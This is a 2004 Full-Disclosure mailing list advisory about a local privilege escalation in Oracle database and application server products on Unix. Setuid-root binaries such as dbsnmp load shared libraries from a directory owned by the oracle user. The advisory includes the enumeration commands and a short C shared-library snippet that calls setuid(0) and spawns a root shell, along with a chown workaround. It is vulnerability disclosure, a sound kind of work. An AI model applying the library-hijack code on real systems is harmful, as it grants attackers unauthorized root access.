[Full-Disclosure] OPEN3S - Local Privilege Elevation through Oracle products (Unix Platform)

Fri, 30 Jul 2004 05:59:56 -0700 

----------========== OPEN3S-2004-10-05-eng-oracle-so-libraries ==========----------


 Title:    Local Vulnerability in Oracle Products. RDBMS, IAs, etc 
           All Versions. (10g not tested)
 Date:     10-05-2004
 Platform: Tested in Linux, Solaris & HP-UX  but can be exported to others. 
 Impact:   Privilege elevation from oracle products installation owner 
           (usually called oracle or ias ) to root.
 Author:   Juan Manuel Pascual Escriba
 Status:   Vendor contacted details below. 



INTRODUCTION:

Oracle Corporation (nasdaqNM - ORCL) is a world leading database software developer, 
claiming to develop an unbreakable software. It's products are targeted in database,
application server and data mining market.


PROBLEM SUMMARY:

This software version
	- Oracle 8i Linux Platform
	- Oracle 9i Linux Platform
	- Oracle 8i HP-UX Platform
	- Oracle 9i Solaris Platform
	- Oracle IAS 9.0.2.0.1 with patchset v9.0.2.3
	- All versions tested in Unix platform (Universal?¿)

are suitable to privilege elevation from oracle software owner ( normally oracle,ias,
iasr2) to root.


DESCRIPTION

Oracle Libraries are installed owned by oracle in a default installation of the products 
commented above.

[EMAIL PROTECTED] home]$ ls -alc /export/home/iasr2/ora9ias_mid
...
drwxr-xr-x   3 iasr2    dba          512 Nov 21 14:04 lbs
drwxr-xr-x  15 iasr2    dba          512 Jan  7 12:13 ldap
drwxr-xr-x   3 iasr2    dba        12800 Nov 21 11:22 lib
drwxr-xr-x  13 iasr2    dba          512 Nov 21 14:04 network
drwxr-xr-x   3 iasr2    dba          512 Nov 21 14:04 ocommon
...

As you can see, the lib directory owner is iasr2, let's look for some setuid binaries

[EMAIL PROTECTED] ora9ias_mid]$ find ./ -perm +4000
./bin/dbsnmp
./bin/nmo

[EMAIL PROTECTED] ora9ias_mid]$ ls -alc ./bin/dbsnmp
-rwsr-s---   1 root     dba      2900980 Nov 21 14:04 ./bin/dbsnmp
[EMAIL PROTECTED] ora9ias_mid]$ ls -alc ./bin/nmo
-rwsr-s---   1 root     dba        12632 Nov 21 14:04 ./bin/nmo

And now, just could see the shared objects that the binaries depends.

[EMAIL PROTECTED] ora9ias_mid]$ ldd ./bin/dbsnmp
        libvppdc.so =>   /export/home/iasr2/ora9ias_mid/lib/libvppdc.so
        libclntsh.so.9.0 =>      /export/home/iasr2/ora9ias_mid/lib/libclntsh.so.9.0
        libwtc9.so =>    /export/home/iasr2/ora9ias_mid/lib//libwtc9.so
        libthread.so.1 =>        /usr/lib/libthread.so.1
        libkstat.so.1 =>         /usr/lib/libkstat.so.1
	....

[EMAIL PROTECTED] ora9ias_mid]$  ldd ./bin/nmo
        libnsl.so.1 =>   /usr/lib/libnsl.so.1
        libsocket.so.1 =>        /usr/lib/libsocket.so.1
        libgen.so.1 =>   /usr/lib/libgen.so.1
	.....

ups, it's not posible to achieve root privileges with this binary and by this way


For iasr2 user is too easy to create a so.lib, something like

#include 
#include 

_init() {
   printf("en el _init()\n");
   printf("Con PID=%i y EUID=%i",getpid(),getuid());
   setuid(0);
   system("/usr/bin/ksh");
   printf("Saliendo del Init()\n");
}


	
IMPACT
	
	oracle,ias,iasr2 or iasdb users with local access can gain root privileges through 
	oracle installation


EXPLOIT

	commented above.


WORKAROUND

	chown to root lib directory and parent directory.


STATUS

	Oracle Security Alerts explains in an email sent 26/07/2004 that  "Oracle believes that
	only trusted users should have access to the local iasdb user account".

	I have no information about a patch or a solution from Oracle Corp.




--------------------------------------------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba            [EMAIL PROTECTED]
Barcelona - Denia - Spain              http://www.open3s.com

Reply via email to